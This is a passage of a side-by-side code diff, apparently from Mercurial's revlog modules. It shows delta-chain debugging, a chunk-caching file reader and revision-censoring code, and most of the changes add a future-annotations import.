737 | 739 | # |
|
738 | 740 | # However we need to detect that as a special case for delta-type, that |
|
739 | 741 | # is not simply "other". |
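# Hypothetical illustration of the special case above: if p1 is rev 8,
# rev 8 stores an empty delta whose base is rev 5, and this revision's
# delta base is also rev 5, the delta type is reported as 'skip1' below
# instead of 'other'.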
|
740 | 742 | p1_base = p1 |
|
741 | 743 | if p1 != nodemod.nullrev and p1 < self._total_revs: |
|
742 | 744 | e1 = self._index[p1] |
|
743 | 745 | while e1[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0: |
|
744 | 746 | new_base = e1[constants.ENTRY_DELTA_BASE] |
|
745 | 747 | if ( |
|
746 | 748 | new_base == p1_base |
|
747 | 749 | or new_base == nodemod.nullrev |
|
748 | 750 | or new_base >= self._total_revs |
|
749 | 751 | ): |
|
750 | 752 | break |
|
751 | 753 | p1_base = new_base |
|
752 | 754 | e1 = self._index[p1_base] |
|
753 | 755 | p2_base = p2 |
|
754 | 756 | if p2 != nodemod.nullrev and p2 < self._total_revs: |
|
755 | 757 | e2 = self._index[p2] |
|
756 | 758 | while e2[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0: |
|
757 | 759 | new_base = e2[constants.ENTRY_DELTA_BASE] |
|
758 | 760 | if ( |
|
759 | 761 | new_base == p2_base |
|
760 | 762 | or new_base == nodemod.nullrev |
|
761 | 763 | or new_base >= self._total_revs |
|
762 | 764 | ): |
|
763 | 765 | break |
|
764 | 766 | p2_base = new_base |
|
765 | 767 | e2 = self._index[p2_base] |
|
766 | 768 | |
|
767 | 769 | if self._generaldelta: |
|
768 | 770 | if base == p1: |
|
769 | 771 | deltatype = b'p1' |
|
770 | 772 | elif base == p2: |
|
771 | 773 | deltatype = b'p2' |
|
772 | 774 | elif base == rev: |
|
773 | 775 | deltatype = b'base' |
|
774 | 776 | elif base == p1_base: |
|
775 | 777 | deltatype = b'skip1' |
|
776 | 778 | elif base == p2_base: |
|
777 | 779 | deltatype = b'skip2' |
|
778 | 780 | elif self._revlog.issnapshot(rev): |
|
779 | 781 | deltatype = b'snap' |
|
780 | 782 | elif base == rev - 1: |
|
781 | 783 | deltatype = b'prev' |
|
782 | 784 | else: |
|
783 | 785 | deltatype = b'other' |
|
784 | 786 | else: |
|
785 | 787 | if base == rev: |
|
786 | 788 | deltatype = b'base' |
|
787 | 789 | else: |
|
788 | 790 | deltatype = b'prev' |
|
789 | 791 | |
|
790 | 792 | chain = self._revlog._deltachain(rev)[0] |
|
791 | 793 | |
|
792 | 794 | data = { |
|
793 | 795 | 'p1': p1, |
|
794 | 796 | 'p2': p2, |
|
795 | 797 | 'compressed_size': compsize, |
|
796 | 798 | 'uncompressed_size': uncompsize, |
|
797 | 799 | 'deltatype': deltatype, |
|
798 | 800 | 'chain': chain, |
|
799 | 801 | } |
|
800 | 802 | |
|
801 | 803 | if size_info or dist_info or sparse_info: |
|
802 | 804 | chain_size = 0 |
|
803 | 805 | for iter_rev in reversed(chain): |
|
804 | 806 | cached = self._chain_size_cache.get(iter_rev) |
|
805 | 807 | if cached is not None: |
|
806 | 808 | chain_size += cached |
|
807 | 809 | break |
|
808 | 810 | e = self._index[iter_rev] |
|
809 | 811 | chain_size += e[constants.ENTRY_DATA_COMPRESSED_LENGTH] |
|
810 | 812 | self._chain_size_cache[rev] = chain_size |
|
811 | 813 | data['chain_size'] = chain_size |
|
812 | 814 | |
|
813 | 815 | return data |
|
814 | 816 | |
|
815 | 817 | |
|
816 | 818 | def debug_delta_chain( |
|
817 | 819 | revlog, |
|
818 | 820 | revs=None, |
|
819 | 821 | size_info=True, |
|
820 | 822 | dist_info=True, |
|
821 | 823 | sparse_info=True, |
|
822 | 824 | ): |
|
823 | 825 | auditor = DeltaChainAuditor(revlog) |
|
824 | 826 | r = revlog |
|
825 | 827 | start = r.start |
|
826 | 828 | length = r.length |
|
827 | 829 | withsparseread = revlog.data_config.with_sparse_read |
|
828 | 830 | |
|
829 | 831 | header = ( |
|
830 | 832 | b' rev' |
|
831 | 833 | b' p1' |
|
832 | 834 | b' p2' |
|
833 | 835 | b' chain#' |
|
834 | 836 | b' chainlen' |
|
835 | 837 | b' prev' |
|
836 | 838 | b' delta' |
|
837 | 839 | ) |
|
838 | 840 | if size_info: |
|
839 | 841 | header += b' size' b' rawsize' b' chainsize' b' ratio' |
|
840 | 842 | if dist_info: |
|
841 | 843 | header += b' lindist' b' extradist' b' extraratio' |
|
842 | 844 | if withsparseread and sparse_info: |
|
843 | 845 | header += b' readsize' b' largestblk' b' rddensity' b' srchunks' |
|
844 | 846 | header += b'\n' |
|
845 | 847 | yield header |
|
846 | 848 | |
|
847 | 849 | if revs is None: |
|
848 | 850 | all_revs = iter(r) |
|
849 | 851 | else: |
|
850 | 852 | revlog_size = len(r) |
|
851 | 853 | all_revs = sorted(rev for rev in revs if rev < revlog_size) |
|
852 | 854 | |
|
853 | 855 | chainbases = {} |
|
854 | 856 | for rev in all_revs: |
|
855 | 857 | info = auditor.revinfo( |
|
856 | 858 | rev, |
|
857 | 859 | size_info=size_info, |
|
858 | 860 | dist_info=dist_info, |
|
859 | 861 | sparse_info=sparse_info, |
|
860 | 862 | ) |
|
861 | 863 | comp = info['compressed_size'] |
|
862 | 864 | uncomp = info['uncompressed_size'] |
|
863 | 865 | chain = info['chain'] |
|
864 | 866 | chainbase = chain[0] |
|
865 | 867 | chainid = chainbases.setdefault(chainbase, len(chainbases) + 1) |
|
866 | 868 | if dist_info: |
|
867 | 869 | basestart = start(chainbase) |
|
868 | 870 | revstart = start(rev) |
|
869 | 871 | lineardist = revstart + comp - basestart |
|
870 | 872 | extradist = lineardist - info['chain_size'] |
|
871 | 873 | try: |
|
872 | 874 | prevrev = chain[-2] |
|
873 | 875 | except IndexError: |
|
874 | 876 | prevrev = -1 |
|
875 | 877 | |
|
876 | 878 | if size_info: |
|
877 | 879 | chainsize = info['chain_size'] |
|
878 | 880 | if uncomp != 0: |
|
879 | 881 | chainratio = float(chainsize) / float(uncomp) |
|
880 | 882 | else: |
|
881 | 883 | chainratio = chainsize |
|
882 | 884 | |
|
883 | 885 | if dist_info: |
|
884 | 886 | if chainsize != 0: |
|
885 | 887 | extraratio = float(extradist) / float(chainsize) |
|
886 | 888 | else: |
|
887 | 889 | extraratio = extradist |
|
888 | 890 | |
|
889 | 891 | # label, display-format, data-key, value |
|
890 | 892 | entry = [ |
|
891 | 893 | (b'rev', b'%7d', 'rev', rev), |
|
892 | 894 | (b'p1', b'%7d', 'p1', info['p1']), |
|
893 | 895 | (b'p2', b'%7d', 'p2', info['p2']), |
|
894 | 896 | (b'chainid', b'%7d', 'chainid', chainid), |
|
895 | 897 | (b'chainlen', b'%8d', 'chainlen', len(chain)), |
|
896 | 898 | (b'prevrev', b'%8d', 'prevrev', prevrev), |
|
897 | 899 | (b'deltatype', b'%7s', 'deltatype', info['deltatype']), |
|
898 | 900 | ] |
|
899 | 901 | if size_info: |
|
900 | 902 | entry.extend( |
|
901 | 903 | [ |
|
902 | 904 | (b'compsize', b'%10d', 'compsize', comp), |
|
903 | 905 | (b'uncompsize', b'%10d', 'uncompsize', uncomp), |
|
904 | 906 | (b'chainsize', b'%10d', 'chainsize', chainsize), |
|
905 | 907 | (b'chainratio', b'%9.5f', 'chainratio', chainratio), |
|
906 | 908 | ] |
|
907 | 909 | ) |
|
908 | 910 | if dist_info: |
|
909 | 911 | entry.extend( |
|
910 | 912 | [ |
|
911 | 913 | (b'lindist', b'%9d', 'lindist', lineardist), |
|
912 | 914 | (b'extradist', b'%9d', 'extradist', extradist), |
|
913 | 915 | (b'extraratio', b'%10.5f', 'extraratio', extraratio), |
|
914 | 916 | ] |
|
915 | 917 | ) |
|
916 | 918 | if withsparseread and sparse_info: |
|
917 | 919 | chainsize = info['chain_size'] |
|
918 | 920 | readsize = 0 |
|
919 | 921 | largestblock = 0 |
|
920 | 922 | srchunks = 0 |
|
921 | 923 | |
|
922 | 924 | for revschunk in deltautil.slicechunk(r, chain): |
|
923 | 925 | srchunks += 1 |
|
924 | 926 | blkend = start(revschunk[-1]) + length(revschunk[-1]) |
|
925 | 927 | blksize = blkend - start(revschunk[0]) |
|
926 | 928 | |
|
927 | 929 | readsize += blksize |
|
928 | 930 | if largestblock < blksize: |
|
929 | 931 | largestblock = blksize |
|
930 | 932 | |
|
931 | 933 | if readsize: |
|
932 | 934 | readdensity = float(chainsize) / float(readsize) |
|
933 | 935 | else: |
|
934 | 936 | readdensity = 1 |
|
935 | 937 | entry.extend( |
|
936 | 938 | [ |
|
937 | 939 | (b'readsize', b'%10d', 'readsize', readsize), |
|
938 | 940 | (b'largestblock', b'%10d', 'largestblock', largestblock), |
|
939 | 941 | (b'readdensity', b'%9.5f', 'readdensity', readdensity), |
|
940 | 942 | (b'srchunks', b'%8d', 'srchunks', srchunks), |
|
941 | 943 | ] |
|
942 | 944 | ) |
|
943 | 945 | yield entry |
@@ -1,230 +1,232 | |||
|
1 | 1 | # Copyright Mercurial Contributors |
|
2 | 2 | # |
|
3 | 3 | # This software may be used and distributed according to the terms of the |
|
4 | 4 | # GNU General Public License version 2 or any later version. |
|
5 | 5 | |
|
6 | from __future__ import annotations | |
|
7 | ||
|
6 | 8 | import contextlib |
|
7 | 9 | |
|
8 | 10 | from ..i18n import _ |
|
9 | 11 | from .. import ( |
|
10 | 12 | error, |
|
11 | 13 | util, |
|
12 | 14 | ) |
|
13 | 15 | |
|
14 | 16 | |
|
15 | 17 | _MAX_CACHED_CHUNK_SIZE = 1048576 # 1 MiB |
|
16 | 18 | |
|
17 | 19 | PARTIAL_READ_MSG = _( |
|
18 | 20 | b'partial read of revlog %s; expected %d bytes from offset %d, got %d' |
|
19 | 21 | ) |
|
20 | 22 | |
|
21 | 23 | |
|
22 | 24 | def _is_power_of_two(n): |
|
23 | 25 | return (n & (n - 1) == 0) and n != 0 |
|
24 | 26 | |
|
25 | 27 | |
|
26 | 28 | class appender: |
|
27 | 29 | """the changelog index must be updated last on disk, so we use this class |
|
28 | 30 | to delay writes to it""" |
|
29 | 31 | |
|
30 | 32 | def __init__(self, vfs, name, mode, buf): |
|
31 | 33 | self.data = buf |
|
32 | 34 | fp = vfs(name, mode) |
|
33 | 35 | self.fp = fp |
|
34 | 36 | self.offset = fp.tell() |
|
35 | 37 | self.size = vfs.fstat(fp).st_size |
|
36 | 38 | self._end = self.size |
|
37 | 39 | |
|
38 | 40 | def end(self): |
|
39 | 41 | return self._end |
|
40 | 42 | |
|
41 | 43 | def tell(self): |
|
42 | 44 | return self.offset |
|
43 | 45 | |
|
44 | 46 | def flush(self): |
|
45 | 47 | pass |
|
46 | 48 | |
|
47 | 49 | @property |
|
48 | 50 | def closed(self): |
|
49 | 51 | return self.fp.closed |
|
50 | 52 | |
|
51 | 53 | def close(self): |
|
52 | 54 | self.fp.close() |
|
53 | 55 | |
|
54 | 56 | def seek(self, offset, whence=0): |
|
55 | 57 | '''virtual file offset spans real file and data''' |
|
56 | 58 | if whence == 0: |
|
57 | 59 | self.offset = offset |
|
58 | 60 | elif whence == 1: |
|
59 | 61 | self.offset += offset |
|
60 | 62 | elif whence == 2: |
|
61 | 63 | self.offset = self.end() + offset |
|
62 | 64 | if self.offset < self.size: |
|
63 | 65 | self.fp.seek(self.offset) |
|
64 | 66 | |
|
65 | 67 | def read(self, count=-1): |
|
66 | 68 | '''only trick here is reads that span real file and data''' |
|
67 | 69 | ret = b"" |
|
68 | 70 | if self.offset < self.size: |
|
69 | 71 | s = self.fp.read(count) |
|
70 | 72 | ret = s |
|
71 | 73 | self.offset += len(s) |
|
72 | 74 | if count > 0: |
|
73 | 75 | count -= len(s) |
|
74 | 76 | if count != 0: |
|
75 | 77 | doff = self.offset - self.size |
|
76 | 78 | self.data.insert(0, b"".join(self.data)) |
|
77 | 79 | del self.data[1:] |
|
78 | 80 | s = self.data[0][doff : doff + count] |
|
79 | 81 | self.offset += len(s) |
|
80 | 82 | ret += s |
|
81 | 83 | return ret |
|
82 | 84 | |
|
83 | 85 | def write(self, s): |
|
84 | 86 | self.data.append(bytes(s)) |
|
85 | 87 | self.offset += len(s) |
|
86 | 88 | self._end += len(s) |
|
87 | 89 | |
|
88 | 90 | def __enter__(self): |
|
89 | 91 | self.fp.__enter__() |
|
90 | 92 | return self |
|
91 | 93 | |
|
92 | 94 | def __exit__(self, *args): |
|
93 | 95 | return self.fp.__exit__(*args) |
|
94 | 96 | |
|
95 | 97 | |
|
96 | 98 | class randomaccessfile: |
|
97 | 99 | """Accessing arbitrary chuncks of data within a file, with some caching""" |
|
98 | 100 | |
|
99 | 101 | def __init__( |
|
100 | 102 | self, |
|
101 | 103 | opener, |
|
102 | 104 | filename, |
|
103 | 105 | default_cached_chunk_size, |
|
104 | 106 | initial_cache=None, |
|
105 | 107 | ): |
|
106 | 108 | # Required by bitwise manipulation below |
|
107 | 109 | assert _is_power_of_two(default_cached_chunk_size) |
|
108 | 110 | |
|
109 | 111 | self.opener = opener |
|
110 | 112 | self.filename = filename |
|
111 | 113 | self.default_cached_chunk_size = default_cached_chunk_size |
|
112 | 114 | self.writing_handle = None # This is set from revlog.py |
|
113 | 115 | self.reading_handle = None |
|
114 | 116 | self._cached_chunk = b'' |
|
115 | 117 | self._cached_chunk_position = 0 # Offset from the start of the file |
|
116 | 118 | if initial_cache: |
|
117 | 119 | self._cached_chunk_position, self._cached_chunk = initial_cache |
|
118 | 120 | |
|
119 | 121 | def clear_cache(self): |
|
120 | 122 | self._cached_chunk = b'' |
|
121 | 123 | self._cached_chunk_position = 0 |
|
122 | 124 | |
|
123 | 125 | @property |
|
124 | 126 | def is_open(self): |
|
125 | 127 | """True if any file handle is being held |
|
126 | 128 | |
|
127 | 129 | Used for assert and debug in the python code""" |
|
128 | 130 | return ( |
|
129 | 131 | self.reading_handle is not None or self.writing_handle is not None |
|
130 | 132 | ) |
|
131 | 133 | |
|
132 | 134 | def _open(self, mode=b'r'): |
|
133 | 135 | """Return a file object""" |
|
134 | 136 | return self.opener(self.filename, mode=mode) |
|
135 | 137 | |
|
136 | 138 | @contextlib.contextmanager |
|
137 | 139 | def _read_handle(self): |
|
138 | 140 | """File object suitable for reading data""" |
|
139 | 141 | # Use a file handle being actively used for writes, if available. |
|
140 | 142 | # There is some danger to doing this because reads will seek the |
|
141 | 143 | # file. However, revlog._writeentry performs a SEEK_END before all |
|
142 | 144 | # writes, so we should be safe. |
|
143 | 145 | if self.writing_handle: |
|
144 | 146 | yield self.writing_handle |
|
145 | 147 | |
|
146 | 148 | elif self.reading_handle: |
|
147 | 149 | yield self.reading_handle |
|
148 | 150 | |
|
149 | 151 | # Otherwise open a new file handle. |
|
150 | 152 | else: |
|
151 | 153 | with self._open() as fp: |
|
152 | 154 | yield fp |
|
153 | 155 | |
|
154 | 156 | @contextlib.contextmanager |
|
155 | 157 | def reading(self): |
|
156 | 158 | """Context manager that keeps the file open for reading""" |
|
157 | 159 | if ( |
|
158 | 160 | self.reading_handle is None |
|
159 | 161 | and self.writing_handle is None |
|
160 | 162 | and self.filename is not None |
|
161 | 163 | ): |
|
162 | 164 | with self._open() as fp: |
|
163 | 165 | self.reading_handle = fp |
|
164 | 166 | try: |
|
165 | 167 | yield |
|
166 | 168 | finally: |
|
167 | 169 | self.reading_handle = None |
|
168 | 170 | else: |
|
169 | 171 | yield |
|
170 | 172 | |
|
171 | 173 | def read_chunk(self, offset, length): |
|
172 | 174 | """Read a chunk of bytes from the file. |
|
173 | 175 | |
|
174 | 176 | Accepts an absolute offset, length to read. |
|
175 | 177 | |
|
176 | 178 | Returns a str or buffer of raw byte data. |
|
177 | 179 | |
|
178 | 180 | Raises if the requested number of bytes could not be read. |
|
179 | 181 | """ |
|
180 | 182 | end = offset + length |
|
181 | 183 | cache_start = self._cached_chunk_position |
|
182 | 184 | cache_end = cache_start + len(self._cached_chunk) |
|
183 | 185 | # Is the requested chunk within the cache? |
|
184 | 186 | if cache_start <= offset and end <= cache_end: |
|
185 | 187 | if cache_start == offset and end == cache_end: |
|
186 | 188 | return self._cached_chunk # avoid a copy |
|
187 | 189 | relative_start = offset - cache_start |
|
188 | 190 | return util.buffer(self._cached_chunk, relative_start, length) |
|
189 | 191 | |
|
190 | 192 | return self._read_and_update_cache(offset, length) |
|
191 | 193 | |
|
192 | 194 | def _read_and_update_cache(self, offset, length): |
|
193 | 195 | # Cache data both forward and backward around the requested |
|
194 | 196 | # data, in a fixed size window. This helps speed up operations |
|
195 | 197 | # involving reading the revlog backwards. |
|
196 | 198 | real_offset = offset & ~(self.default_cached_chunk_size - 1) |
|
197 | 199 | real_length = ( |
|
198 | 200 | (offset + length + self.default_cached_chunk_size) |
|
199 | 201 | & ~(self.default_cached_chunk_size - 1) |
|
200 | 202 | ) - real_offset |
|
201 | 203 | with self._read_handle() as file_obj: |
|
202 | 204 | file_obj.seek(real_offset) |
|
203 | 205 | data = file_obj.read(real_length) |
|
204 | 206 | |
|
205 | 207 | self._add_cached_chunk(real_offset, data) |
|
206 | 208 | |
|
207 | 209 | relative_offset = offset - real_offset |
|
208 | 210 | got = len(data) - relative_offset |
|
209 | 211 | if got < length: |
|
210 | 212 | message = PARTIAL_READ_MSG % (self.filename, length, offset, got) |
|
211 | 213 | raise error.RevlogError(message) |
|
212 | 214 | |
|
213 | 215 | if offset != real_offset or real_length != length: |
|
214 | 216 | return util.buffer(data, relative_offset, length) |
|
215 | 217 | return data |
|
216 | 218 | |
|
217 | 219 | def _add_cached_chunk(self, offset, data): |
|
218 | 220 | """Add to or replace the cached data chunk. |
|
219 | 221 | |
|
220 | 222 | Accepts an absolute offset and the data that is at that location. |
|
221 | 223 | """ |
|
222 | 224 | if ( |
|
223 | 225 | self._cached_chunk_position + len(self._cached_chunk) == offset |
|
224 | 226 | and len(self._cached_chunk) + len(data) < _MAX_CACHED_CHUNK_SIZE |
|
225 | 227 | ): |
|
226 | 228 | # add to existing cache |
|
227 | 229 | self._cached_chunk += data |
|
228 | 230 | else: |
|
229 | 231 | self._cached_chunk = data |
|
230 | 232 | self._cached_chunk_position = offset |
@@ -1,883 +1,885 | |||
|
1 | 1 | # code related to censoring revisions
|
2 | 2 | # coding: utf8 |
|
3 | 3 | # |
|
4 | 4 | # Copyright 2021 Pierre-Yves David <pierre-yves.david@octobus.net> |
|
5 | 5 | # Copyright 2015 Google, Inc <martinvonz@google.com> |
|
6 | 6 | # |
|
7 | 7 | # This software may be used and distributed according to the terms of the |
|
8 | 8 | # GNU General Public License version 2 or any later version. |
|
9 | 9 | |
|
10 | from __future__ import annotations | |
|
11 | ||
|
10 | 12 | import binascii |
|
11 | 13 | import contextlib |
|
12 | 14 | import os |
|
13 | 15 | import struct |
|
14 | 16 | |
|
15 | 17 | from ..node import ( |
|
16 | 18 | nullrev, |
|
17 | 19 | ) |
|
18 | 20 | from .constants import ( |
|
19 | 21 | COMP_MODE_PLAIN, |
|
20 | 22 | ENTRY_DATA_COMPRESSED_LENGTH, |
|
21 | 23 | ENTRY_DATA_COMPRESSION_MODE, |
|
22 | 24 | ENTRY_DATA_OFFSET, |
|
23 | 25 | ENTRY_DATA_UNCOMPRESSED_LENGTH, |
|
24 | 26 | ENTRY_DELTA_BASE, |
|
25 | 27 | ENTRY_LINK_REV, |
|
26 | 28 | ENTRY_NODE_ID, |
|
27 | 29 | ENTRY_PARENT_1, |
|
28 | 30 | ENTRY_PARENT_2, |
|
29 | 31 | ENTRY_SIDEDATA_COMPRESSED_LENGTH, |
|
30 | 32 | ENTRY_SIDEDATA_COMPRESSION_MODE, |
|
31 | 33 | ENTRY_SIDEDATA_OFFSET, |
|
32 | 34 | REVIDX_ISCENSORED, |
|
33 | 35 | REVLOGV0, |
|
34 | 36 | REVLOGV1, |
|
35 | 37 | ) |
|
36 | 38 | from ..i18n import _ |
|
37 | 39 | |
|
38 | 40 | from .. import ( |
|
39 | 41 | error, |
|
40 | 42 | mdiff, |
|
41 | 43 | pycompat, |
|
42 | 44 | revlogutils, |
|
43 | 45 | util, |
|
44 | 46 | ) |
|
45 | 47 | from ..utils import ( |
|
46 | 48 | storageutil, |
|
47 | 49 | ) |
|
48 | 50 | from . import ( |
|
49 | 51 | constants, |
|
50 | 52 | deltas, |
|
51 | 53 | ) |
|
52 | 54 | |
|
53 | 55 | |
|
54 | 56 | def v1_censor(rl, tr, censor_nodes, tombstone=b''): |
|
55 | 57 | """censors a revision in a "version 1" revlog""" |
|
56 | 58 | assert rl._format_version == constants.REVLOGV1, rl._format_version |
|
57 | 59 | |
|
58 | 60 | # avoid cycle |
|
59 | 61 | from .. import revlog |
|
60 | 62 | |
|
61 | 63 | censor_revs = set(rl.rev(node) for node in censor_nodes) |
|
62 | 64 | tombstone = storageutil.packmeta({b'censored': tombstone}, b'') |
|
63 | 65 | |
|
64 | 66 | # Rewriting the revlog in place is hard. Our strategy for censoring is |
|
65 | 67 | # to create a new revlog, copy all revisions to it, then replace the |
|
66 | 68 | # revlogs on transaction close. |
|
67 | 69 | # |
|
68 | 70 | # This is a bit dangerous. We could easily have a mismatch of state. |
|
69 | 71 | newrl = revlog.revlog( |
|
70 | 72 | rl.opener, |
|
71 | 73 | target=rl.target, |
|
72 | 74 | radix=rl.radix, |
|
73 | 75 | postfix=b'tmpcensored', |
|
74 | 76 | censorable=True, |
|
75 | 77 | data_config=rl.data_config, |
|
76 | 78 | delta_config=rl.delta_config, |
|
77 | 79 | feature_config=rl.feature_config, |
|
78 | 80 | may_inline=rl._inline, |
|
79 | 81 | ) |
|
80 | 82 | # inline splitting will prepare some transaction work that will get |
|
81 | 83 | # confused by the final file move. So if there is a risk of not being |
|
82 | 84 | # inline at the end, we prevent the new revlog from being inline in the first
|
83 | 85 | # place. |
|
84 | 86 | assert not (newrl._inline and not rl._inline) |
|
85 | 87 | |
|
86 | 88 | for rev in rl.revs(): |
|
87 | 89 | node = rl.node(rev) |
|
88 | 90 | p1, p2 = rl.parents(node) |
|
89 | 91 | |
|
90 | 92 | if rev in censor_revs: |
|
91 | 93 | newrl.addrawrevision( |
|
92 | 94 | tombstone, |
|
93 | 95 | tr, |
|
94 | 96 | rl.linkrev(rev), |
|
95 | 97 | p1, |
|
96 | 98 | p2, |
|
97 | 99 | node, |
|
98 | 100 | constants.REVIDX_ISCENSORED, |
|
99 | 101 | ) |
|
100 | 102 | |
|
101 | 103 | if newrl.deltaparent(rev) != nullrev: |
|
102 | 104 | m = _(b'censored revision stored as delta; cannot censor') |
|
103 | 105 | h = _( |
|
104 | 106 | b'censoring of revlogs is not fully implemented;' |
|
105 | 107 | b' please report this bug' |
|
106 | 108 | ) |
|
107 | 109 | raise error.Abort(m, hint=h) |
|
108 | 110 | continue |
|
109 | 111 | |
|
110 | 112 | if rl.iscensored(rev): |
|
111 | 113 | if rl.deltaparent(rev) != nullrev: |
|
112 | 114 | m = _( |
|
113 | 115 | b'cannot censor due to censored ' |
|
114 | 116 | b'revision having delta stored' |
|
115 | 117 | ) |
|
116 | 118 | raise error.Abort(m) |
|
117 | 119 | rawtext = rl._inner._chunk(rev) |
|
118 | 120 | else: |
|
119 | 121 | rawtext = rl.rawdata(rev) |
|
120 | 122 | |
|
121 | 123 | newrl.addrawrevision( |
|
122 | 124 | rawtext, tr, rl.linkrev(rev), p1, p2, node, rl.flags(rev) |
|
123 | 125 | ) |
|
124 | 126 | |
|
125 | 127 | tr.addbackup(rl._indexfile, location=b'store') |
|
126 | 128 | if not rl._inline: |
|
127 | 129 | tr.addbackup(rl._datafile, location=b'store') |
|
128 | 130 | |
|
129 | 131 | rl.opener.rename(newrl._indexfile, rl._indexfile) |
|
130 | 132 | if newrl._inline: |
|
131 | 133 | assert rl._inline |
|
132 | 134 | else: |
|
133 | 135 | assert not rl._inline |
|
134 | 136 | rl.opener.rename(newrl._datafile, rl._datafile) |
|
135 | 137 | |
|
136 | 138 | rl.clearcaches() |
|
137 | 139 | chunk_cache = rl._loadindex() |
|
138 | 140 | rl._load_inner(chunk_cache) |
|
139 | 141 | |
|
140 | 142 | |
|
141 | 143 | def v2_censor(revlog, tr, censor_nodes, tombstone=b''): |
|
142 | 144 | """censors a revision in a "version 2" revlog""" |
|
143 | 145 | assert revlog._format_version != REVLOGV0, revlog._format_version |
|
144 | 146 | assert revlog._format_version != REVLOGV1, revlog._format_version |
|
145 | 147 | |
|
146 | 148 | censor_revs = {revlog.rev(node) for node in censor_nodes} |
|
147 | 149 | _rewrite_v2(revlog, tr, censor_revs, tombstone) |
|
148 | 150 | |
|
149 | 151 | |
|
150 | 152 | def _rewrite_v2(revlog, tr, censor_revs, tombstone=b''): |
|
151 | 153 | """rewrite a revlog to censor some of its content |
|
152 | 154 | |
|
153 | 155 | General principle |
|
154 | 156 | |
|
155 | 157 | We create new revlog files (index/data/sidedata) to copy the content of |
|
156 | 158 | the existing data without the censored data. |
|
157 | 159 | |
|
158 | 160 | We need to recompute a new delta for any revision that used the censored
|
159 | 161 | revision as delta base. As the cumulative size of the new delta may be |
|
160 | 162 | large, we store them in a temporary file until they are stored in their |
|
161 | 163 | final destination. |
|
162 | 164 | |
|
163 | 165 | All data before the censored data can be blindly copied. The rest needs |
|
164 | 166 | to be copied as we go and the associated index entry needs adjustment.
|
165 | 167 | """ |
|
166 | 168 | assert revlog._format_version != REVLOGV0, revlog._format_version |
|
167 | 169 | assert revlog._format_version != REVLOGV1, revlog._format_version |
|
168 | 170 | |
|
169 | 171 | old_index = revlog.index |
|
170 | 172 | docket = revlog._docket |
|
171 | 173 | |
|
172 | 174 | tombstone = storageutil.packmeta({b'censored': tombstone}, b'') |
|
173 | 175 | |
|
174 | 176 | first_excl_rev = min(censor_revs) |
|
175 | 177 | |
|
176 | 178 | first_excl_entry = revlog.index[first_excl_rev] |
|
177 | 179 | index_cutoff = revlog.index.entry_size * first_excl_rev |
|
178 | 180 | data_cutoff = first_excl_entry[ENTRY_DATA_OFFSET] >> 16 |
|
179 | 181 | sidedata_cutoff = revlog.sidedata_cut_off(first_excl_rev) |
|
180 | 182 | |
|
181 | 183 | with pycompat.unnamedtempfile(mode=b"w+b") as tmp_storage: |
|
182 | 184 | # rev → (new_base, data_start, data_end, compression_mode)
|
183 | 185 | rewritten_entries = _precompute_rewritten_delta( |
|
184 | 186 | revlog, |
|
185 | 187 | old_index, |
|
186 | 188 | censor_revs, |
|
187 | 189 | tmp_storage, |
|
188 | 190 | ) |
|
189 | 191 | |
|
190 | 192 | all_files = _setup_new_files( |
|
191 | 193 | revlog, |
|
192 | 194 | index_cutoff, |
|
193 | 195 | data_cutoff, |
|
194 | 196 | sidedata_cutoff, |
|
195 | 197 | ) |
|
196 | 198 | |
|
197 | 199 | # we don't need to open the old index file since its content already
|
198 | 200 | # exists in a usable form in `old_index`.
|
199 | 201 | with all_files() as open_files: |
|
200 | 202 | ( |
|
201 | 203 | old_data_file, |
|
202 | 204 | old_sidedata_file, |
|
203 | 205 | new_index_file, |
|
204 | 206 | new_data_file, |
|
205 | 207 | new_sidedata_file, |
|
206 | 208 | ) = open_files |
|
207 | 209 | |
|
208 | 210 | # writing the censored revision |
|
209 | 211 | |
|
210 | 212 | # Writing all subsequent revisions |
|
211 | 213 | for rev in range(first_excl_rev, len(old_index)): |
|
212 | 214 | if rev in censor_revs: |
|
213 | 215 | _rewrite_censor( |
|
214 | 216 | revlog, |
|
215 | 217 | old_index, |
|
216 | 218 | open_files, |
|
217 | 219 | rev, |
|
218 | 220 | tombstone, |
|
219 | 221 | ) |
|
220 | 222 | else: |
|
221 | 223 | _rewrite_simple( |
|
222 | 224 | revlog, |
|
223 | 225 | old_index, |
|
224 | 226 | open_files, |
|
225 | 227 | rev, |
|
226 | 228 | rewritten_entries, |
|
227 | 229 | tmp_storage, |
|
228 | 230 | ) |
|
229 | 231 | docket.write(transaction=None, stripping=True) |
|
230 | 232 | |
|
231 | 233 | |
|
232 | 234 | def _precompute_rewritten_delta( |
|
233 | 235 | revlog, |
|
234 | 236 | old_index, |
|
235 | 237 | excluded_revs, |
|
236 | 238 | tmp_storage, |
|
237 | 239 | ): |
|
238 | 240 | """Compute new delta for revisions whose delta is based on revision that |
|
239 | 241 | will not survive as is. |
|
240 | 242 | |
|
241 | 243 | Return a mapping: {rev → (new_base, data_start, data_end, compression_mode)}
|
242 | 244 | """ |
|
243 | 245 | dc = deltas.deltacomputer(revlog) |
|
244 | 246 | rewritten_entries = {} |
|
245 | 247 | first_excl_rev = min(excluded_revs) |
|
246 | 248 | with revlog.reading(): |
|
247 | 249 | for rev in range(first_excl_rev, len(old_index)): |
|
248 | 250 | if rev in excluded_revs: |
|
249 | 251 | # this revision will be preserved as is, so we don't need to |
|
250 | 252 | # consider recomputing a delta. |
|
251 | 253 | continue |
|
252 | 254 | entry = old_index[rev] |
|
253 | 255 | if entry[ENTRY_DELTA_BASE] not in excluded_revs: |
|
254 | 256 | continue |
|
255 | 257 | # This is a revision that uses the censored revision as the base
|
256 | 258 | # for its delta. We need to compute a new delta for it.
|
257 | 259 | if entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] == 0: |
|
258 | 260 | # this revision is empty, we can delta against nullrev |
|
259 | 261 | rewritten_entries[rev] = (nullrev, 0, 0, COMP_MODE_PLAIN) |
|
260 | 262 | else: |
|
261 | 263 | text = revlog.rawdata(rev) |
|
262 | 264 | info = revlogutils.revisioninfo( |
|
263 | 265 | node=entry[ENTRY_NODE_ID], |
|
264 | 266 | p1=revlog.node(entry[ENTRY_PARENT_1]), |
|
265 | 267 | p2=revlog.node(entry[ENTRY_PARENT_2]), |
|
266 | 268 | btext=[text], |
|
267 | 269 | textlen=len(text), |
|
268 | 270 | cachedelta=None, |
|
269 | 271 | flags=entry[ENTRY_DATA_OFFSET] & 0xFFFF, |
|
270 | 272 | ) |
|
